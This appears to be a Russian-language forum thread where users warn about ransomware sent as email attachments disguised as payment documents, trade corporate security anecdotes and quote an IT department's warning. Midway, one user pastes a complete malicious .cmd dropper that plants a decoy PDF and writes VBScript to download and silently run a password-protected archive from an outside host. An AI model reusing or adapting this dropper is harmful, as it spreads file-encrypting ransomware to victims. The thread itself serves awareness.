Мошенничество с отправкой программ и скриптов по электронке. Внимательнее!

[Гризыч]

Я могу хоть каждый день отсылать вам вирусы, тренируйтесь!

Мне что бы такой вирус запустить много действий надо сделать... Он так просто ни в линуксе ни во фряхе не запустится. А в винде у меня кроме игрушек ничего нет - там даже рара нет

[MagnumAE]

П.с.вверху ссылка есть, даже хакеры есть, че то у них не получается нифига

Там сцыль на форум. Ты мне письмо с вирусом скинь плз - очень стало интересно

Мне что бы такой вирус запустить много действий надо сделать... Он так просто ни в линуксе ни во фряхе не запустится.

Охота пуще неволи

[COOLLER]

Бгат, при двойно нажатии на файл даже запроса не происходит установить/ открыть или че то другое, он тут же устанавливается

Кэп это cmd файл ты хочешь чтобы криптер тебя спрашивал - вы действительно хотите попандоса на 600 евро или подумаете?

Зря. Если тебе именно диагностические проги нужны - можно, конечно попробовать их в коробке запустить, и, если не пошли - накатить второй системой винды (только в обратном порядке). При всем при этом винды вообще оффлайновыми сделать, убить тысячи системного мусора, и радоваться жизни

Заставил задумаццца

[iudex]

Кто тупой как курица из твоей бухгалтерии просто платит баблом за свой косяк

Ну не заплатишь ту курице 10 тыр ее зарплаты, она уволится. А вся система сдохла.... ладно если один комп только слетит.
С людской тупостью нифига не сделаешь. 90% людей по умственному развитию отстают от куриц

[MagnumAE]

С людской тупостью нифига не сделаешь.

\
В легкую.
На нашем отделении железной дороги обслугой компов занимается специально созданная контора. Политики безопасности грузятся при запуске виндов только с их серверов, заперты на использование любых портов, запрет на запуск почти любых программ, явно не разрешенных, любая активность уровнем выше чем "тупой юзверь" блокируется и руководителю подразделения высылается письмо-указивка с требованием разобраться и наказать, независимо от того, какой вид активности был - пинг ли из командной строки или попытка слить из интранета справочник на 200 мегов.
А, и еще ограничение размеров писем запилено. Раньше было 2 мега, потом, когда я уже уходил, было 6 мегов....Как сейчас - не знаю, но наше отделение было по сети дорог лидером в плане отсутствия сетевого мусора, елочек на новый год и прочего разного

[Skodник]

Ты мне письмо с вирусом скинь плз - очень стало интересно

отправил! если че пиши с мобилы!
завтра ехе отправлю

[COOLLER]

\
В легкую.
На нашем отделении железной дороги обслугой компов занимается специально созданная контора. Политики безопасности грузятся при запуске виндов только с их серверов, заперты на использование любых портов, запрет на запуск почти любых программ, явно не разрешенных, любая активность уровнем выше чем "тупой юзверь" блокируется и руководителю подразделения высылается письмо-указивка с требованием разобраться и наказать, независимо от того, какой вид активности был - пинг ли из командной строки или попытка слить из интранета справочник на 200 мегов.
А, и еще ограничение размеров писем запилено. Раньше было 2 мега, потом, когда я уже уходил, было 6 мегов....Как сейчас - не знаю, но наше отделение было по сети дорог лидером в плане отсутствия сетевого мусора, елочек на новый год и прочего разного

Дай контакт конторки клубню в Питер, а то их курицы только в минус работают

[iudex]

В легкую.

Ню ню.
Я не спец в компах, но мой опыт подсказывает, что в любом вопросе тупицы могут наделать такого, что спец даже за деньги не сможет.

любая активность уровнем выше чем "тупой юзверь"

а чем открытие файла rar выходит за рамки юзверя???? или все-таки выходит

[MagnumAE]

Листинг исполняемого файла. Я ОЧЕНЬ-ОЧЕНЬ надеюсь, что ни у кого ничего не произойдет и наш клуб не упадет

echo off

rem
if exist c:\winsys goto byye
rem


set PPP=WshShell.Run
rem


set ppp1="c:\winsys\xrar.cmd"
rem


set ppp2=Chr(34)
rem


set ppp3=,
rem


set ppp4=0
rem


set dire=%~dp0




echo error in pdf file>%cd%\Proverka_dannih_po_oplate.pdf


rem
set dire=%cd%






mkdir c:\winsys






cd c:\






cd winsys






echo document>doc18-06.pdf






start doc18-06.pdf






echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>>c:\winsys\x.vbs






echo dim taraStrm: Set taraStrm = createobject("Adodb.Stream")>>c:\winsys\x.vbs






echo xHttp.Open "GET", "http://net2ftp.ru/node0/jettikayr@gmail.com/arc.rar", False>>c:\winsys\x.vbs






echo xHttp.Send>>c:\winsys\x.vbs






echo with taraStrm>>c:\winsys\x.vbs






echo .type = 1 '//binary>>c:\winsys\x.vbs






echo .open>>c:\winsys\x.vbs






echo .write xHttp.responseBody>>c:\winsys\x.vbs






echo .savetofile "c:\winsys\arc.rar", 2 '//overwrite>>c:\winsys\x.vbs






echo end with>>c:\winsys\x.vbs






echo Set WshShell = CreateObject("WScript.Shell")>>c:\winsys\wonc.vbs






echo %PPP% %ppp2% ^& %ppp1% ^& %ppp2%%ppp3% %ppp4% >>c:\winsys\wonc.vbs






echo Set WshShell = Nothing>>c:\winsys\wonc.vbs








echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>>c:\winsys\xx.vbs






echo dim taraStrm: Set taraStrm = createobject("Adodb.Stream")>>c:\winsys\xx.vbs






echo xHttp.Open "GET", "http://net2ftp.ru/node0/jettikayr@gmail.com/Rar", False>>c:\winsys\xx.vbs






echo xHttp.Send>>c:\winsys\xx.vbs






echo with taraStrm>>c:\winsys\xx.vbs






echo .type = 1 '//binary>>c:\winsys\xx.vbs






echo .open>>c:\winsys\xx.vbs






echo .write xHttp.responseBody>>c:\winsys\xx.vbs






echo .savetofile "c:\winsys\Rar", 2 '//overwrite>>c:\winsys\xx.vbs






echo end with>>c:\winsys\xx.vbs






x.vbs






xx.vbs






ren rar rar.exe






rar e -p123123 arc.rar






c:\winsys\wonc.vbs






echo %dire%






echo þþþ>%dire%\Proverka_dannih_po_oplate.cmd








:byye






start c:\winsys\doc18-06.pdf
rem
rem

--- Добавлено чуть позже ---

Дай контакт конторки клубню в Питер, а то их курицы только в минус работают

Не...они только по железной дороге работают, это во первых, а во вторых питерское подразделение этой конторы - самое разгильдяйское

Я не спец в компах, но мой опыт подсказывает, что в любом вопросе тупицы могут наделать такого, что спец даже за деньги не сможет.

Когда юзеру разрешено только снимать почту, открывать офисные файлы и шевелить мышкой, то там сложно чего то сделать У меня даже скриптик самопальный по созданию рекурсии мегабайтных папок не запускался

а чем открытие файла rar выходит за рамки юзверя???? или все-таки выходит

ТАкие фалы у рждшников отсекаются на уровне почтового сервера. У меня, кстати, в аутглюке поставлено просто удаление всех файлов, отличающихся от офисных, фото и еще там чего то. Точнее закрыты к исполнению все батники, комы, дллы и прочие сус с экзешниками.

[COOLLER]

Ну судя по описалову это trojan encoder 556

[Skodник]

Так и че с файлом то?
По русски пжлста

--- Добавлено чуть позже ---

Ну судя по описалову это trojan encoder 556

Это же смд

[COOLLER]

А вот интересно. Он же файлы архивирует...а оригинал удаляет. А если попытаться восстановить оригинал?

[Skodник]

А он тебе даст boot from cd?

[COOLLER]

Skodник, зачем бут фром сиди?

[MagnumAE]

А он тебе даст boot from cd?

Вроде как в биос этот не лезет. Чет мне по ходу будет сегодня чем заняться ночью дома

[tahoe]

На работе на корпаративной почте про такие письма служба IT наверно с нового года предупреждает всех, один фиг народ умудряется открывать файлы.
Буквально вчера пришло новое предупреждение про вариант со скачиванием:

Уважаемые пользователи!


С 16.06.2015 г. на электронную почту пользователей промплощадки Санкт-Петербурга стали приходить очередные версии писем, содержащих ссылки на вредоносный код. Пример письма ниже:

При открытии ссылок из такого письма, скачивании архивов с «информацией», распаковывании этих архивов происходит шифрование фалов на вашем ПК.

Призываем вас быть бдительными и не открывать ссылки и вложения, содержащиеся в письмах от неизвестных адресатов.



При малейшем подозрении на содержание письма запросите подтверждение у отправителя любым альтернативным способом (телефон, Lync, Skype, СМС, электронная почта…) и, в случае отсутствия такового, удалите письмо.


При обнаружении заражения:

1. Немедленно выключите питание компьютера и отключите его от вычислительной сети. Это предотвратит шифрование данных как на вашем локальном диске, так и на сетевых папках, подключенных к ПК. Процедура шифрования происходит не одномоментно, а занимает определённое время;

2. Обратитесь в службу технической поддержки.

Служба поддержки пользователей

[Skodник]

tahoe, причем письма прихолили раньше с созданных емейлов, теперь приходят с реальных, взломанных почтовых адресов компаний!

--- Добавлено чуть позже ---

Вроде как в биос этот не лезет. Чет мне по ходу будет сегодня чем заняться ночью дома

Подожди до утра, должен придти ехе акт сверки!

--- Добавлено чуть позже ---

Skodник, зачем бут фром сиди?

А как восстановить?

[COOLLER]

А как восстановить?

Кого? Винду или файлы?

[Lemur]

вам и сайты подкидываю где расписано про заработки на таких и так на форуме пишется как и что...
неужели с Мусей валерьянкой балуешься
сочувствую, у нас права разграничены и идет бекап каждые два часа всех файлов, нагрузка большая конечно IT оборудование, зато опа гореть не будет

--- Добавлено чуть позже ---

теперь приходят с реальных, взломанных почтовых адресов компаний!

незря же сбрутили столько адресов, пароли все сменили?

[AXel_23]

В последнее время очень много приходит писем с вложениями в виде файлов в формате exe, cmd, rar.
При открытии все файлы компьютера зашифровываются.
Расшифровка своими силами не получается. Люди платят.
Адреса получателей реальные, даже телефоны есть, но люди не в курсе.. сами в шоке от взлома!
Понятно что старый развод, будьте внимательнее!


http://www.yaplakal.com/forum32/topic892670.html

Ты короче будешь, баянист года